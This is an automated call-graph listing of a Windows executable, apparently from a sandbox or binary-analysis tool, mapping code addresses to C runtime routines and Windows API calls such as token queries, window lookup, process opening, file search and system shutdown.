80770->80771 80772 11161d01 __ehhandler$?_Copy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@IAEXII@Z 5 API calls 80771->80772 80773 1116deb0 GetCurrentProcess TerminateProcess 80772->80773 80773->80736 80778 11162b51 _malloc 66 API calls 80777->80778 80779 1110f4ae 80778->80779 80780 1110f4b7 80779->80780 80782 1110f4ce _memset 80779->80782 80787 11029450 265 API calls 2 library calls 80780->80787 80782->80607 80784->80607 80785->80610 80786->80615 80790 110d05d9 80789->80790 80791 110d05ec 80789->80791 80790->80791 80792 110d0450 265 API calls 80790->80792 80791->80647 80791->80648 80792->80791 80795 11162bf0 HeapFree 80794->80795 80796 11162c19 _free 80794->80796 80795->80796 80797 11162c05 80795->80797 80796->80652 80800 111692ef 66 API calls __getptd_noexit 80797->80800 80799 11162c0b GetLastError 80799->80796 80800->80799 80802 1109e9c6 80801->80802 80803 1109e930 GetTokenInformation 80801->80803 80804 11161d01 __ehhandler$?_Copy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@IAEXII@Z 5 API calls 80802->80804 80805 1109e952 __crtCompareStringA_stat 80803->80805 80806 1109e9d8 80804->80806 80805->80802 80807 1109e958 GetTokenInformation 80805->80807 80806->80265 80807->80802 80808 1109e96a 80807->80808 80809 1109e99f EqualSid 80808->80809 80810 1109e973 AllocateAndInitializeSid 80808->80810 80809->80802 80811 1109e9ad 80809->80811 80810->80802 80810->80809 80812 11161d01 __ehhandler$?_Copy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@IAEXII@Z 5 API calls 80811->80812 80813 1109e9c2 80812->80813 80813->80265 80815 1114302a 80814->80815 80815->80281 80817 11162dd1 80816->80817 80835 1116364b 80817->80835 80820 11163a2d 80821 11163a4d 80820->80821 80822 11163a3b 80820->80822 80970 111639dc 79 API calls 2 library calls 80821->80970 80822->80293 80824 11163a57 80824->80293 80826 11081c6d 80825->80826 80827 11081c72 80825->80827 80971 11081990 IsDBCSLeadByte 80826->80971 80829 11081c7b 80827->80829 80830 11081c93 80827->80830 80972 11163784 85 API calls 3 library calls 80829->80972 80832 11081c99 80830->80832 80834 11165797 85 API calls std::locale::facet::_Facet_Register 80830->80834 80832->80282 80833 11081c8c 80833->80282 80834->80830 80836 11163664 80835->80836 80839 11163420 80836->80839 80851 11163399 80839->80851 80841 11163444 80859 111692ef 66 API calls __getptd_noexit 80841->80859 80844 11163449 80860 1116df04 11 API calls _setlocale 80844->80860 80847 1116347a 80849 111634c1 80847->80849 80861 11170c05 79 API calls 3 library calls 80847->80861 80850 1114519e 80849->80850 80862 111692ef 66 API calls __getptd_noexit 80849->80862 80850->80820 80852 111633ac 80851->80852 80854 111633f9 80851->80854 80863 1116b7b5 80852->80863 80854->80841 80854->80847 80857 111633d9 80857->80854 80883 11170744 68 API calls 6 library calls 80857->80883 80859->80844 80860->80850 80861->80847 80862->80850 80884 1116b73c GetLastError 80863->80884 80865 1116b7bd 80866 111633b1 80865->80866 80898 1116d7aa 66 API calls 3 library calls 80865->80898 80866->80857 80868 111704a8 80866->80868 80869 111704b4 _setlocale 80868->80869 80870 1116b7b5 __getptd 66 API calls 80869->80870 80872 111704b9 80870->80872 80871 111704e7 80921 1117373c 80871->80921 80872->80871 80874 111704cb 80872->80874 80876 1116b7b5 __getptd 66 API calls 80874->80876 80875 111704ee 80928 1117045b 74 API calls 3 library calls 80875->80928 80878 111704d0 80876->80878 80880 111704de _setlocale 80878->80880 80920 1116d7aa 66 API calls 3 library calls 80878->80920 80879 11170502 80929 11170515 LeaveCriticalSection _doexit 80879->80929 80880->80857 80883->80854 80899 1116b5fa TlsGetValue 80884->80899 80887 1116b7a9 SetLastError 80887->80865 80890 1116b76f DecodePointer 80891 1116b784 80890->80891 80892 1116b7a0 80891->80892 80893 1116b788 80891->80893 80895 11162be5 _free 62 API calls 80892->80895 80908 1116b688 66 API calls 4 library calls 80893->80908 80897 1116b7a6 80895->80897 80896 1116b790 GetCurrentThreadId 80896->80887 80897->80887 80900 1116b60f DecodePointer TlsSetValue 80899->80900 80901 1116b62a 80899->80901 80900->80901 80901->80887 80902 11169dbe 80901->80902 80905 11169dc7 80902->80905 80904 11169e04 80904->80887 80904->80890 80905->80904 80906 11169de5 Sleep 80905->80906 80909 11170166 80905->80909 80907 11169dfa 80906->80907 80907->80904 80907->80905 80908->80896 80910 11170172 80909->80910 80915 1117018d 80909->80915 80911 1117017e 80910->80911 80910->80915 80918 111692ef 66 API calls __getptd_noexit 80911->80918 80913 111701a0 RtlAllocateHeap 80913->80915 80916 111701c7 80913->80916 80914 11170183 80914->80905 80915->80913 80915->80916 80919 1116d4a8 DecodePointer 80915->80919 80916->80905 80918->80914 80919->80915 80922 11173764 EnterCriticalSection 80921->80922 80923 11173751 80921->80923 80922->80875 80930 1117367a 80923->80930 80925 11173757 80925->80922 80957 1116d7aa 66 API calls 3 library calls 80925->80957 80928->80879 80929->80878 80931 11173686 _setlocale 80930->80931 80932 11173696 80931->80932 80933 111736ae 80931->80933 80958 1116d99d 66 API calls 2 library calls 80932->80958 80942 111736bc _setlocale 80933->80942 80961 11169d79 80933->80961 80935 1117369b 80959 1116d7ee 66 API calls 7 library calls 80935->80959 80939 111736a2 80960 1116d52d GetModuleHandleW GetProcAddress ExitProcess ___crtCorExitProcess 80939->80960 80940 111736ce 80967 111692ef 66 API calls __getptd_noexit 80940->80967 80941 111736dd 80945 1117373c __lock 65 API calls 80941->80945 80942->80925 80947 111736e4 80945->80947 80948 11173717 80947->80948 80949 111736ec InitializeCriticalSectionAndSpinCount 80947->80949 80952 11162be5 _free 65 API calls 80948->80952 80950 11173708 80949->80950 80951 111736fc 80949->80951 80969 11173733 LeaveCriticalSection _doexit 80950->80969 80953 11162be5 _free 65 API calls 80951->80953 80952->80950 80954 11173702 80953->80954 80968 111692ef 66 API calls __getptd_noexit 80954->80968 80958->80935 80959->80939 80963 11169d82 80961->80963 80962 11162b51 _malloc 65 API calls 80962->80963 80963->80962 80964 11169db8 80963->80964 80965 11169d99 Sleep 80963->80965 80964->80940 80964->80941 80966 11169dae 80965->80966 80966->80963 80966->80964 80967->80942 80968->80950 80969->80942 80970->80824 80971->80827 80972->80833 80973->80307 80974 11115b70 80992 11145320 80974->80992 80977 11115bb5 80978 11115b98 80977->80978 80979 11115bc4 CoInitialize CoCreateInstance 80977->80979 80980 11161d01 __ehhandler$?_Copy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@IAEXII@Z 5 API calls 80978->80980 80982 11115bf4 LoadLibraryA 80979->80982 80985 11115be9 80979->80985 80983 11115ba6 80980->80983 80981 111450a0 std::locale::facet::_Facet_Register 90 API calls 80981->80977 80984 11115c10 GetProcAddress 80982->80984 80982->80985 80988 11115c20 SHGetSettings 80984->80988 80989 11115c34 FreeLibrary 80984->80989 80986 11115cd1 CoUninitialize 80985->80986 80987 11115cd7 80985->80987 80986->80987 80990 11161d01 __ehhandler$?_Copy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@IAEXII@Z 5 API calls 80987->80990 80988->80989 80989->80985 80991 11115ce6 80990->80991 80993 111450a0 std::locale::facet::_Facet_Register 90 API calls 80992->80993 80994 11115b8e 80993->80994 80994->80977 80994->80978 80994->80981 80995 11025d00 80996 11025d0e GetProcAddress 80995->80996 80997 11025d1f 80995->80997 80996->80997 80998 11025d38 80997->80998 80999 11025d2c K32GetProcessImageFileNameA 80997->80999 81001 11025d3e GetProcAddress 80998->81001 81002 11025d4f 80998->81002 80999->80998 81000 11025d71 80999->81000 81001->81002 81003 11025d56 81002->81003 81004 11025d67 SetLastError 81002->81004 81004->81000 81005 11173a35 81006 1116b7b5 __getptd 66 API calls 81005->81006 81007 11173a52 _LcidFromHexString 81006->81007 81008 11173a5f GetLocaleInfoA 81007->81008 81009 11173a86 81008->81009 81010 11173a92 81008->81010 81012 11161d01 __ehhandler$?_Copy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@IAEXII@Z 5 API calls 81009->81012 81028 111646ce 85 API calls 3 library calls 81010->81028 81014 11173c02 81012->81014 81013 11173a9e 81015 11173aa8 GetLocaleInfoA 81013->81015 81026 11173ad8 _LangCountryEnumProc@4 _strlen 81013->81026 81015->81009 81016 11173ac7 81015->81016 81029 111646ce 85 API calls 3 library calls 81016->81029 81017 11173b4b GetLocaleInfoA 81017->81009 81019 11173b6e 81017->81019 81031 111646ce 85 API calls 3 library calls 81019->81031 81020 11173ad2 81020->81026 81030 11163784 85 API calls 3 library calls 81020->81030 81022 11173b79 81022->81009 81025 11173b81 _strlen 81022->81025 81032 111646ce 85 API calls 3 library calls 81022->81032 81025->81009 81033 111739da GetLocaleInfoW _GetPrimaryLen _strlen 81025->81033 81026->81009 81026->81017 81028->81013 81029->81020 81030->81026 81031->81022 81032->81025 81033->81009 81034 1102e640 81035 1102e683 81034->81035 81036 1110f420 std::locale::facet::_Facet_Register 265 API calls 81035->81036 81037 1102e68a 81036->81037 81039 1102e6aa 81037->81039 82105 11142a60 81037->82105 81433 11142bb0 81039->81433 81041 1102e6d4 81042 1102e701 81041->81042 82113 11081bb0 81041->82113 81045 11142bb0 86 API calls 81042->81045 81044 1102e6e6 81046 11081bb0 86 API calls 81044->81046 81047 1102e72a 81045->81047 81046->81042 81049 11162de7 std::locale::facet::_Facet_Register 79 API calls 81047->81049 81052 1102e737 81047->81052 81048 1102e766 81050 1102e7e5 CreateEventA 81048->81050 81051 1102e7bf GetSystemMetrics 81048->81051 81049->81052 81057 1102e805 81050->81057 81058 1102e819 81050->81058 81051->81050 81053 1102e7ce 81051->81053 81052->81048 81055 111450a0 std::locale::facet::_Facet_Register 90 API calls 81052->81055 81056 11146450 std::locale::facet::_Facet_Register 21 API calls 81053->81056 81055->81048 81059 1102e7d8 81056->81059 82267 11029450 265 API calls 2 library calls 81057->82267 81061 1110f420 std::locale::facet::_Facet_Register 265 API calls 81058->81061 82123 1102d330 81059->82123 81063 1102e820 81061->81063 81064 1102e840 81063->81064 81065 111100d0 424 API calls 81063->81065 81066 1110f420 std::locale::facet::_Facet_Register 265 API calls 81064->81066 81065->81064 81067 1102e854 81066->81067 81068 111100d0 424 API calls 81067->81068 81069 1102e874 81067->81069 81068->81069 81070 1110f420 std::locale::facet::_Facet_Register 265 API calls 81069->81070 81071 1102e8f3 81070->81071 81072 1102e923 81071->81072 82268 11060f70 301 API calls std::locale::facet::_Facet_Register 81071->82268 81074 1110f420 std::locale::facet::_Facet_Register 265 API calls 81072->81074 81075 1102e93d 81074->81075 81076 1102e962 FindWindowA 81075->81076 82269 11060be0 293 API calls std::locale::facet::_Facet_Register 81075->82269 81079 1102eab7 81076->81079 81080 1102e99b 81076->81080 81440 110613d0 81079->81440 81080->81079 81084 1102e9b3 GetWindowThreadProcessId 81080->81084 81083 110613d0 268 API calls 81085 1102ead5 81083->81085 81086 11146450 std::locale::facet::_Facet_Register 21 API calls 81084->81086 81087 110613d0 268 API calls 81085->81087 81088 1102e9d9 OpenProcess 81086->81088 81089 1102eae1 81087->81089 81088->81079 81090 1102e9f9 81088->81090 81091 1102eaf8 81089->81091 81092 1102eaef 81089->81092 82270 11094b30 105 API calls 81090->82270 81447 11145910 81091->81447 82271 11027d60 119 API calls 2 library calls 81092->82271 81094 1102ea18 81096 11146450 std::locale::facet::_Facet_Register 21 API calls 81094->81096 81099 1102ea2c 81096->81099 81097 1102eaf4 81097->81091 81101 1102ea6b CloseHandle FindWindowA 81099->81101 81102 11146450 std::locale::facet::_Facet_Register 21 API calls 81099->81102 81100 1102eb07 81462 11144dc0 ExpandEnvironmentStringsA 81100->81462 81103 1102ea93 GetWindowThreadProcessId 81101->81103 81104 1102eaa7 81101->81104 81106 1102ea3e SendMessageA WaitForSingleObject 81102->81106 81103->81104 81107 11146450 std::locale::facet::_Facet_Register 21 API calls 81104->81107 81106->81101 81110 1102ea5e 81106->81110 81111 1102eab4 81107->81111 81113 11146450 std::locale::facet::_Facet_Register 21 API calls 81110->81113 81111->81079 81112 1102eb2a 81114 1102ec01 81112->81114 81486 11062d60 81112->81486 81115 1102ea68 81113->81115 81501 110274c0 81114->81501 81115->81101 82332 11142ac0 81433->82332 81435 11142bc5 81436 11142bf3 81435->81436 81437 11142ac0 IsDBCSLeadByte 81435->81437 81438 11165797 85 API calls std::locale::facet::_Facet_Register 81435->81438 81439 11142bfc 81435->81439 81436->81041 81437->81435 81438->81435 81439->81041 81441 11061446 81440->81441 81442 110613f7 81440->81442 81443 11161d01 __ehhandler$?_Copy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@IAEXII@Z 5 API calls 81441->81443 81442->81441 81445 11081bb0 86 API calls 81442->81445 82344 110612f0 268 API calls 4 library calls 81442->82344 81444 1102eac9 81443->81444 81444->81083 81445->81442 82345 11144bd0 81447->82345 81450 11144bd0 std::locale::facet::_Facet_Register 265 API calls 81451 11145947 wsprintfA 81450->81451 81452 11143230 std::locale::facet::_Facet_Register 8 API calls 81451->81452 81453 11145964 81452->81453 81454 11145990 81453->81454 81455 11143230 std::locale::facet::_Facet_Register 8 API calls 81453->81455 81456 11161d01 __ehhandler$?_Copy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@IAEXII@Z 5 API calls 81454->81456 81458 11145979 81455->81458 81457 1114599c 81456->81457 81457->81100 81458->81454 81459 11145980 81458->81459 81460 11161d01 __ehhandler$?_Copy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@IAEXII@Z 5 API calls 81459->81460 81461 1114598c 81460->81461 81461->81100 81463 11144df7 81462->81463 81464 11144e04 81463->81464 81465 11144e14 std::locale::facet::_Facet_Register 81463->81465 81466 11144e2e 81463->81466 81469 11142290 std::locale::facet::_Facet_Register 265 API calls 81464->81469 81470 11144e25 GetModuleFileNameA 81465->81470 81467 11144bd0 std::locale::facet::_Facet_Register 265 API calls 81466->81467 81468 11144e34 81467->81468 81472 11081b40 std::locale::facet::_Facet_Register IsDBCSLeadByte 81468->81472 81471 11144e88 81469->81471 81470->81468 81473 11161d01 __ehhandler$?_Copy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@IAEXII@Z 5 API calls 81471->81473 81472->81464 81474 1102eb18 81473->81474 81475 11143230 81474->81475 81476 11143251 CreateFileA 81475->81476 81478 111432ee CloseHandle 81476->81478 81479 111432ce 81476->81479 81482 11161d01 __ehhandler$?_Copy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@IAEXII@Z 5 API calls 81478->81482 81480 111432d2 CreateFileA 81479->81480 81481 1114330b 81479->81481 81480->81478 81480->81481 81483 11161d01 __ehhandler$?_Copy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@IAEXII@Z 5 API calls 81481->81483 81484 11143307 81482->81484 81485 1114331a 81483->81485 81484->81112 81485->81112 81487 1105dd10 79 API calls 81486->81487 81488 11062d88 81487->81488 82394 11061c90 81488->82394 83164 11060f40 81501->83164 82106 11142aa8 82105->82106 82109 11142a6e 82105->82109 82107 11142290 std::locale::facet::_Facet_Register 265 API calls 82106->82107 82108 11142ab0 82107->82108 82108->81039 82109->82106 82110 11142a92 82109->82110 84805 11142310 267 API calls std::locale::facet::_Facet_Register 82110->84805 82112 11142a98 82112->81039 82114 11081bbd 82113->82114 82115 11081bc2 82113->82115 84806 11081990 IsDBCSLeadByte 82114->84806 82117 11081bcb 82115->82117 82121 11081bdf 82115->82121 84807 111646ce 85 API calls 3 library calls 82117->84807 82119 11081bd8 82119->81044 82120 11081c43 82120->81044 82121->82120 82122 11165797 85 API calls std::locale::facet::_Facet_Register 82121->82122 82122->82121 82124 11146450 std::locale::facet::_Facet_Register 21 API calls 82123->82124 82125 1102d36c 82124->82125 82126 11145320 std::locale::facet::_Facet_Register 90 API calls 82125->82126 82127 1102d374 82126->82127 82128 1102d3a9 GetCurrentProcess SetPriorityClass 82127->82128 82129 1102d37d InterlockedIncrement 82127->82129 82131 1102d3dd 82128->82131 82129->82128 82130 1102d38c 82129->82130 82132 11146450 std::locale::facet::_Facet_Register 21 API calls 82130->82132 82133 1102d3e6 SetEvent 82131->82133 82138 1102d3ed 82131->82138 82134 1102d396 82132->82134 82133->82138 82136 1102d3a0 Sleep 82134->82136 82135 1102d424 82137 1102d452 82135->82137 84827 1109f1d0 273 API calls std::locale::facet::_Facet_Register 82135->84827 82136->82136 84828 11028e70 583 API calls std::locale::facet::_Facet_Register 82137->84828 82138->82135 84825 11029370 279 API calls 2 library calls 82138->84825 82142 1102d40d 84826 110ff6c0 278 API calls 2 library calls 82142->84826 82143 1102d463 84808 11028090 SetEvent 82143->84808 82146 1102d468 82147 1102d472 82146->82147 82148 1102d47d 82146->82148 84829 110ec980 751 API calls 82147->84829 82150 1102d49a 82148->82150 82151 1102d49f 82148->82151 84830 110594a0 SetEvent 82150->84830 82152 1102d4a7 82151->82152 82153 1102d4de 82151->82153 82152->82153 82160 1102d4d3 Sleep 82152->82160 82155 11146450 std::locale::facet::_Facet_Register 21 API calls 82153->82155 82156 1102d4e8 82155->82156 82157 1102d4f5 82156->82157 82158 1102d526 82156->82158 82157->82156 82161 1105dd10 79 API calls 82157->82161 82159 1102d523 82158->82159 82162 1102d58a 82158->82162 82163 1102d53f 82158->82163 82159->82158 82159->82162 82160->82153 82164 1102d518 82161->82164 84834 11026f20 6 API calls std::ios_base::_Ios_base_dtor 82162->84834 84809 110affa0 82163->84809 82164->82158 84831 1102cff0 294 API calls std::locale::facet::_Facet_Register 82164->84831 82168 1102d590 82173 1102d5af PostThreadMessageA 82168->82173 82178 1102d5cb 82168->82178 82171 1102d613 82174 1102d62d 82171->82174 82184 11146450 std::locale::facet::_Facet_Register 21 API calls 82171->82184 84835 1110f3a0 WaitForSingleObject 82173->84835 82180 1102d66b 82174->82180 84838 11105420 26 API calls std::locale::facet::_Facet_Register 82174->84838 82175 1102d5f0 84837 11059400 DeleteCriticalSection CloseHandle 82175->84837 82178->82171 82178->82175 84836 1110f3a0 WaitForSingleObject 82178->84836 82179 1102d56a 82266 1102d57d std::ios_base::_Ios_base_dtor 82179->82266 84833 111352b0 299 API calls 5 library calls 82179->84833 82183 1102d681 82180->82183 82188 11075d10 700 API calls 82180->82188 82189 11146450 std::locale::facet::_Facet_Register 21 API calls 82183->82189 82184->82174 82186 1102d661 84839 11107b50 661 API calls std::locale::facet::_Facet_Register 82186->84839 82188->82183 82193 1102d68b 82189->82193 82192 1102d889 82196 1102d8a0 82192->82196 84858 1100d200 wsprintfA 82192->84858 82197 1113cc30 311 API calls 82193->82197 82194 1102d666 84840 11105ac0 347 API calls std::locale::facet::_Facet_Register 82194->84840 82205 1102d8c7 GetModuleFileNameA GetFileAttributesA 82196->82205 82218 1102d9e3 82196->82218 82201 1102d690 82197->82201 82203 11146450 std::locale::facet::_Facet_Register 21 API calls 82201->82203 82202 1102d895 82204 11146450 std::locale::facet::_Facet_Register 21 API calls 82202->82204 82206 1102d69a 82203->82206 82204->82196 82208 1102d8ef 82205->82208 82205->82218 82213 1102d6ae std::ios_base::_Ios_base_dtor 82206->82213 84841 1109d920 WaitForSingleObject SetEvent WaitForSingleObject CloseHandle 82206->84841 82207 11146450 std::locale::facet::_Facet_Register 21 API calls 82210 1102da92 82207->82210 82212 1110f420 std::locale::facet::_Facet_Register 265 API calls 82208->82212 84861 11146410 FreeLibrary 82210->84861 82211 11146450 std::locale::facet::_Facet_Register 21 API calls 82215 1102d6c1 82211->82215 82216 1102d8f6 82212->82216 82213->82211 82225 1102d6d5 std::ios_base::_Ios_base_dtor 82215->82225 84842 1110e5c0 DeleteCriticalSection std::ios_base::_Ios_base_dtor 82215->84842 82219 11142a60 267 API calls 82216->82219 82229 1102d918 82216->82229 82217 1102da9a 82220 1102dad6 82217->82220 82223 1102dac4 ExitWindowsEx 82217->82223 82224 1102dab4 ExitWindowsEx Sleep 82217->82224 82218->82207 82219->82229 82226 1102dae6 82220->82226 82227 1102dadb Sleep 82220->82227 82222 1102d74f 82235 1102d760 std::ios_base::_Ios_base_dtor 82222->82235 84845 1110fc70 278 API calls 2 library calls 82222->84845 82223->82220 82224->82223 82225->82222 84843 1110fc10 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection std::ios_base::_Ios_base_dtor 82225->84843 82230 11146450 std::locale::facet::_Facet_Register 21 API calls 82226->82230 82227->82226 82233 11142bb0 86 API calls 82229->82233 82231 1102daf0 ExitProcess 82230->82231 82237 1102d93d 82233->82237 82256 1102d7d9 std::ios_base::_Ios_base_dtor 82235->82256 84846 1110fc70 278 API calls 2 library calls 82235->84846 82236 11146450 std::locale::facet::_Facet_Register 21 API calls 82238 1102d7ec 82236->82238 82237->82218 82240 11081b40 std::locale::facet::_Facet_Register IsDBCSLeadByte 82237->82240 82239 1102d809 CloseHandle 82238->82239 84847 1108a570 82238->84847 82244 1102d824 82239->82244 82245 1102d82a 82239->82245 82243 1102d953 82240->82243 82241 11146450 std::locale::facet::_Facet_Register 21 API calls 82258 1102d6ff std::ios_base::_Ios_base_dtor 82241->82258 82247 1102d96e _memset 82243->82247 84859 11029450 265 API calls 2 library calls 82243->84859 82248 11162be5 _free 66 API calls 82244->82248 82245->82266 84854 1110fc10 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection std::ios_base::_Ios_base_dtor 82245->84854 82246 1102d800 std::ios_base::_Ios_base_dtor 82246->82239 82251 1102d988 FindFirstFileA 82247->82251 82248->82245 82252 1102d9d4 82251->82252 82253 1102d9a8 FindNextFileA 82251->82253 82254 1102d858 82254->82266 84856 1110fc70 278 API calls 2 library calls 82254->84856 82256->82236 82257 11162be5 _free 66 API calls 82260 1102d83c 82257->82260 82258->82222 82258->82241 84844 1110fc10 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection std::ios_base::_Ios_base_dtor 82258->84844 82260->82254 82260->82257 84855 1110fc10 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection std::ios_base::_Ios_base_dtor 82260->84855 84857 1100d4e0 FreeLibrary 82266->84857 82268->81072 82269->81076 82270->81094 82271->81097 82333 11142ad6 82332->82333 82335 11142b93 82333->82335 82339 11081a70 82333->82339 82335->81435 82336 11142afb 82337 11081a70 IsDBCSLeadByte 82336->82337 82338 11142b2b _memmove 82337->82338 82338->81435 82340 11081a7c 82339->82340 82342 11081a81 __mbschr_l std::locale::facet::_Facet_Register 82339->82342 82343 11081990 IsDBCSLeadByte 82340->82343 82342->82336 82343->82342 82344->81442 82346 11144bf2 82345->82346 82349 11144c09 std::locale::facet::_Facet_Register 82345->82349 82391 11029450 265 API calls 2 library calls 82346->82391 82351 11144c3c GetModuleFileNameA 82349->82351 82360 11144d97 82349->82360 82350 11161d01 __ehhandler$?_Copy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@IAEXII@Z 5 API calls 82352 11144db3 wsprintfA 82350->82352 82369 11081b40 82351->82369 82352->81450 82354 11144c51 82355 11144c61 SHGetFolderPathA 82354->82355 82368 11144d48 82354->82368 82357 11144c8e 82355->82357 82358 11144cad SHGetFolderPathA 82355->82358 82356 11142290 std::locale::facet::_Facet_Register 262 API calls 82356->82360 82357->82358 82361 11144c94 82357->82361 82362 11144ce2 std::locale::facet::_Facet_Register 82358->82362 82360->82350 82392 11029450 265 API calls 2 library calls 82361->82392 82365 1102a620 std::locale::facet::_Facet_Register 145 API calls 82362->82365 82366 11144cf3 82365->82366 82366->82366 82373 11144670 82366->82373 82368->82356 82368->82368 82370 11081b53 _strrchr 82369->82370 82372 11081b6a std::locale::facet::_Facet_Register 82370->82372 82393 11081990 IsDBCSLeadByte 82370->82393 82372->82354 82374 111446fa 82373->82374 82375 1114467b 82373->82375 82374->82368 82375->82374 82376 1114468b GetFileAttributesA 82375->82376 82377 111446a5 82376->82377 82378 11144697 82376->82378 82379 11163cf8 __strdup 66 API calls 82377->82379 82378->82368 82380 111446ac 82379->82380 82381 11081b40 std::locale::facet::_Facet_Register IsDBCSLeadByte 82380->82381 82382 111446b6 82381->82382 82383 11144670 std::locale::facet::_Facet_Register 67 API calls 82382->82383 82389 111446d3 82382->82389 82384 111446c6 82383->82384 82385 111446dc 82384->82385 82386 111446ce 82384->82386 82388 11162be5 _free 66 API calls 82385->82388 82387 11162be5 _free 66 API calls 82386->82387 82387->82389 82390 111446e1 CreateDirectoryA 82388->82390 82389->82368 82390->82389 82393->82372 82515 11144ea0 82394->82515 82396 11061d1c 82397 110d1550 268 API calls 82396->82397 82398 11061d30 82397->82398 82400 11061f17 82398->82400 82450 11061d44 std::ios_base::_Ios_base_dtor 82398->82450 82524 1116449d 82398->82524 82399 11062c88 82402 1116449d _fgets 81 API calls 82400->82402 82401 11163db7 std::locale::facet::_Facet_Register 102 API calls 82401->82399 82405 11061f31 82402->82405 82450->82399 82450->82401 82517 11144eb3 std::ios_base::_Ios_base_dtor 82515->82517 82516 11144dc0 267 API calls 82516->82517 82517->82516 82519 11144f1a std::ios_base::_Ios_base_dtor 82517->82519 82520 11144ed5 GetLastError 82517->82520 82616 11163fed 82517->82616 82519->82396 82520->82517 82521 11144ee0 Sleep 82520->82521 82522 11163fed std::locale::facet::_Facet_Register 143 API calls 82521->82522 82523 11144ef2 82522->82523 82523->82517 82523->82519 82525 111644a9 _setlocale 82524->82525 82619 11163f31 82616->82619 82620 11163f3d _setlocale 82619->82620 82621 11163f50 82620->82621 82624 11163f7d 82620->82624 82677 111692ef 66 API calls __getptd_noexit 82621->82677 82623 11163f55 82638 111716f8 82624->82638 82639 11171704 _setlocale 82638->82639 82677->82623 83168 11060e40 83164->83168 83179 11060760 83168->83179 83180 1110f420 std::locale::facet::_Facet_Register 265 API calls 83179->83180 83181 1106077c 83180->83181 83182 110607c5 83181->83182 83183 11060783 83181->83183 83238 1116219a 66 API calls std::exception::_Copy_str 83182->83238 83231 1105e300 83183->83231 83186 110607d4 83239 111625f1 RaiseException 83186->83239 83189 110607e9 83232 1105e311 LeaveCriticalSection 83231->83232 83233 1105e31b 83231->83233 83232->83233 83234 1105e32f 83233->83234 83235 11162be5 _free 66 API calls 83233->83235 83236 1105e375 83234->83236 83237 1105e339 EnterCriticalSection 83234->83237 83235->83234 83238->83186 83239->83189 84805->82112 84806->82115 84807->82119 84808->82146 84862 110805f0 84809->84862 84814 1102d54a 84818 110eb080 84814->84818 84815 110affe7 84874 11029450 265 API calls 2 library calls 84815->84874 84819 110affa0 267 API calls 84818->84819 84820 110eb0ad 84819->84820 84890 110ea450 84820->84890 84824 1102d555 84832 110b0190 267 API calls std::locale::facet::_Facet_Register 84824->84832 84825->82142 84826->82135 84827->82137 84828->82143 84829->82148 84830->82151 84831->82159 84832->82179 84833->82266 84834->82168 84835->82168 84836->82178 84838->82186 84839->82194 84840->82180 84842->82225 84843->82258 84844->82258 84845->82235 84846->82256 84848 1108a617 84847->84848 84852 1108a5aa std::ios_base::_Ios_base_dtor 84847->84852 84849 1108a61e DeleteCriticalSection 84848->84849 84903 1106e1b0 84849->84903 84850 1108a5be CloseHandle 84850->84852 84852->84848 84852->84850 84853 1108a644 std::ios_base::_Ios_base_dtor 84853->82246 84854->82260 84855->82260 84856->82266 84857->82192 84858->82202 84861->82217 84863 11080614 84862->84863 84864 11080618 84863->84864 84865 1108062f 84863->84865 84875 11029450 265 API calls 2 library calls 84864->84875 84866 11080648 84865->84866 84867 1108062c 84865->84867 84871 110aff90 84866->84871 84867->84865 84876 11029450 265 API calls 2 library calls 84867->84876 84877 110812d0 84871->84877 84878 110812f1 84877->84878 84879 1108131d 84877->84879 84878->84879 84880 1108130b 84878->84880 84882 1108136a wsprintfA 84879->84882 84883 11081345 wsprintfA 84879->84883 84881 11161d01 __ehhandler$?_Copy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@IAEXII@Z 5 API calls 84880->84881 84884 11081319 84881->84884 84889 11029450 265 API calls 2 library calls 84882->84889 84883->84879 84884->84814 84884->84815 84892 110ea45b 84890->84892 84891 110ea4f5 84900 110b0190 267 API calls std::locale::facet::_Facet_Register 84891->84900 84892->84891 84893 110ea47e 84892->84893 84894 110ea495 84892->84894 84901 11029450 265 API calls 2 library calls 84893->84901 84896 110ea492 84894->84896 84897 110ea4c2 SendMessageTimeoutA 84894->84897 84896->84894 84902 11029450 265 API calls 2 library calls 84896->84902 84897->84891 84900->84824 84904 1106e1c4 84903->84904 84905 1106e1c8 84904->84905 84907 1106d9a0 67 API calls 2 library calls 84904->84907 84905->84853 84907->84904 84922 11134d10 84923 11134d19 84922->84923 84929 11134d48 84922->84929 84924 11145320 std::locale::facet::_Facet_Register 90 API calls 84923->84924 84925 11134d1e 84924->84925 84926 11132bf0 274 API calls 84925->84926 84925->84929 84927 11134d27 84926->84927 84928 1105dd10 79 API calls 84927->84928 84927->84929 84928->84929 84930 110310c0 84931 110310ce 84930->84931 84932 11145e80 268 API calls 84931->84932 84933 110310df SetUnhandledExceptionFilter 84932->84933 84934 110310ef std::locale::facet::_Facet_Register 84933->84934 84935 11040860 84936 11040892 84935->84936 84937 11040898 84936->84937 84944 110408b4 84936->84944 84938 110facc0 15 API calls 84937->84938 84940 110408aa CloseHandle 84938->84940 84939 110409c8 84941 11161d01 __ehhandler$?_Copy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@IAEXII@Z 5 API calls 84939->84941 84940->84944 84943 110409d5 84941->84943 84942 11040948 84957 110facc0 GetTokenInformation 84942->84957 84944->84939 84947 110408ed 84944->84947 84967 11087ee0 297 API calls 5 library calls 84944->84967 84947->84939 84947->84942 84948 1104095a 84949 11040962 CloseHandle 84948->84949 84953 11040969 84948->84953 84949->84953 84950 110409ab 84951 11161d01 